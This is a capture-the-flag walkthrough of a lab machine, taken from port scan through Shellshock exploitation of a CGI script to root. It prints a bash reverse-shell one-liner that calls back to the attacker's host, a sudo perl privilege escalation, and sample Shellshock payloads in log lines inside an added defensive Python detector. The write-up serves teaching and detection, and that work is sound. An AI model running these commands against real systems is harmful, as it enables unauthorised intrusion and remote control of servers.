- Target: 10.10.10.56
- Goal: Root access
Port Scanning
nmap -p- -A 10.10.10.56

- Port 80/tcp: Apache httpd 2.4.18
- Port 2222/tcp: SSH (OpenSSH 7.2p2 Ubuntu 4ubuntu2.2)
Enumeration
Let’s look at the website:

Only an image. There’s no other information or links. Let’s use gobuster to see any hidden files or directories:
gobuster -u http://10.10.10.56:80/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -e -k -l -s "200,204,301,302,307,401,403" -x "txt,html,php,asp,aspx,jsp"

The /cgi-bin directory looks interesting. While the directory itself returns permission denied, files within it may still be accessible. Let's run another gobuster scan against /cgi-bin.
gobuster -u http://10.10.10.56/cgi-bin -x sh,pl -w /usr/share/wordlists/dirb/common.txt

Found the file user.sh inside the /cgi-bin directory. Browsing to it downloads a plain-text file:
Content-Type: text/plain
Just an uptime test script
09:51:31 up 1:45, 0 users, load average: 0.00, 0.00, 0.00
There is nothing else on the website besides this user.sh shell script. Let's test whether it is vulnerable to Shellshock using the nmap scripting engine:
nmap -p80 -sV --script http-shellshock --script-args "uri=/cgi-bin/user.sh" 10.10.10.56

Looking good. It’s vulnerable to Shellshock.
Exploitation
I am using a bash reverse shell to get shell access. First, start a Netcat listener on port 4444 on the Kali box:
nc -lp 4444
Then use the following bash reverse shell command as the payload in the Shellshock exploit:
/bin/bash -i >& /dev/tcp/10.10.14.21/4444 0>&1

Obtained a limited shell as shelly.
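From the defender's side, the Shellshock probe above leaves a recognisable trace in the Apache access log: the web server exports request headers such as User-Agent and Referer to the CGI script as environment variables, so the exploit's "() {" function prefix ends up in the logged fields. The following detector is an added example and not part of this write-up; the log lines are constructed in Apache's combined format with made-up timestamps and sizes.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Shellshock payloads begin with bash's exported-function prefix "() {".
# Optional whitespace is allowed so variants such as "( ) {" still match.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Apache "combined" log format:
#   ip ident user [time] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Split one combined-format line into its fields, or None if malformed."""
    m = COMBINED_RE.match(line)
    return m.groupdict() if m else None

def find_shellshock_requests(lines: List[str]) -> List[Dict[str, object]]:
    """Return one record per log line whose request line, Referer or User-Agent
    carries the "() {" prefix; 'cgi' flags requests aimed at /cgi-bin/, where
    the web server hands those headers to the script as environment variables."""
    hits = []
    for line in lines:
        rec = parse_combined(line)
        if rec is None:
            continue  # not combined format: skip instead of crashing the scan
        # URL-decode the request line so percent-encoded probes are caught too.
        values = {"request": unquote(rec["request"]), "referer": rec["referer"], "agent": rec["agent"]}
        fields = [name for name, value in values.items() if SHELLSHOCK_RE.search(value)]
        if fields:
            hits.append({"ip": rec["ip"], "request": rec["request"], "fields": fields,
                         "cgi": "/cgi-bin/" in rec["request"]})
    return hits

# Constructed sample log lines in combined format (timestamps and sizes are made up).
SAMPLE_LOG = [
    '10.10.14.21 - - [02/Oct/2017:09:51:31 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "Mozilla/5.0"',
    '10.10.14.21 - - [02/Oct/2017:09:52:02 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "() { :;}; echo shellshock-probe"',
    '10.10.14.21 - - [02/Oct/2017:09:52:10 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "() { :; }; echo probe" "curl/7.55.1"',
    '10.10.14.21 - - [02/Oct/2017:09:52:40 +0000] "GET /cgi-bin/user.sh?%28%29%20%7B%20%3A%3B%7D%3B HTTP/1.1" 200 118 "-" "curl/7.55.1"',
    '10.10.14.22 - - [02/Oct/2017:09:53:00 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    for hit in find_shellshock_requests(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['request']} signature in {hit['fields']} cgi={hit['cgi']}")
```

Pointing the same function at a real access log (one line per list element) flags the source IP and the header that carried the probe, which is what the nmap check and the reverse-shell request above would look like from the server side.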
Privilege Escalation
sudo -l
It shows that shelly can run perl as root. That makes privilege escalation pretty straightforward:
sudo perl -e 'exec("/bin/bash")'

Root access obtained.
Capture the Flag
Simply read /home/shelly/user.txt and /root/root.txt to capture the flags.